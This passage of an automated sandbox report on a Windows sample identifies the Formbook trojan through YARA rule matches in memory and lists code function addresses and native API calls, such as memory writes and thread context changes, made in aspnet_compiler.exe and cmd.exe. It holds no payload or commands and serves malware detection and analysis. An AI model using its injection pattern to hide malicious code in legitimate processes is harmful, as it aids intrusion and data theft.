        Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: Process Memory Space: U8RYIwIvfK.exe PID: 5840, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: Process Memory Space: aspnet_compiler.exe PID: 6120, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: Process Memory Space: cmd.exe PID: 5916, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: Process Memory Space: U8RYIwIvfK.exe PID: 5840, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Process Memory Space: aspnet_compiler.exe PID: 6120, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Process Memory Space: cmd.exe PID: 5916, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A928D0
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A97820
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A9D048
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A90448
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A98188
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A9E1E0
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A94158
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A98A20
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A9BE38
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A93278
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A9C7D0
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A91F68
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A928C0
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A98C20
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A90438
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A9D031
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A98C30
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A95C00
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A97810
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A9405F
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A9E1D3
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A96508
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A96518
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A98178
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A96950
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A962A8
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A91EB0
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A96298
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A95EF1
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A9BE28
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A98A19
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A93268
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A91271
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A98672
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A997E0
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A95BF1
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A997F0
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A9C7C0
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A95F00
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A92300
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A92310
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A98710
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A96760
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A96770
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A91340
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010DF900
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011A2D07
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010D0D20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010F4120
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011A1D55
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01102581
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011A25DD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010ED5E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E841F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01191002
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010EB090
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011020A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011A20A8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011A2B28
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0110EBB0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0119DBD2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011A1FF1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010F6E30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011A22AE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011A2EF7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001BD803
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001BE040
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001B9CF0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001D5CEA
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001B48E6
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001D3506
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001C6550
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001C1969
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001B7190
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001D31DC
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001BFA30
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001B5226
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001B5E70
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001B8AD7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001BCB48
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001C5FC8
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001D6FF0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D12EF7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D122AE
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C66E30
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D0DBD2
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D11FF1
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7EBB0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D12B28
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D128EC
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C5B090
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C720A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D120A8
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D0D466
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01002
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C5841F
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D125DD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 010DB150 appears 35 times
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001C374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119910 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119540 NtReadFile,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011199A0 NtCreateSection,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011195D0 NtClose,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119840 NtDelayExecution,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119860 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011198F0 NtReadVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119710 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119780 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011197A0 NtUnmapViewOfSection,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119A00 NtProtectVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119A20 NtResumeThread,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119A50 NtCreateFile,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119660 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011196E0 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0111AD30 NtSetContextThread,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119520 NtWaitForSingleObject,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119950 NtQueueApcThread,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119560 NtWriteFile,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011199D0 NtCreateProcessEx,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011195F0 NtQueryInformationFile,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119820 NtEnumerateKey,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0111B040 NtSuspendThread,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011198A0 NtWriteVirtualMemory,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0111A710 NtOpenProcessToken,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119B00 NtSetValueKey,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119730 NtQueryVirtualMemory,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119770 NtSetInformationFile,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0111A770 NtOpenThread,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119760 NtOpenProcess,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0111A3B0 NtGetContextThread,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119FE0 NtCreateMutant,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119610 NtEnumerateValueKey,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119A10 NtQuerySection,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119650 NtQueryValueKey,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119670 NtQueryInformationProcess,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119A80 NtOpenDirectoryObject,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011196D0 NtCreateKey,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001BB42E NtOpenThreadToken,NtOpenProcessToken,NtClose,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001B84BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001B58A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001BB4C0 NtQueryInformationToken,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001BB4F8 NtQueryInformationToken,NtQueryInformationToken,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001D6D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001DB5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001D9AB4 NtSetInformationFile,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001B83F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C896D0 NtCreateKey,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C896E0 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C89A50 NtCreateFile,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C89FE0 NtCreateMutant,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C89780 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C89710 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C89840 NtDelayExecution,LdrInitializeThunk,
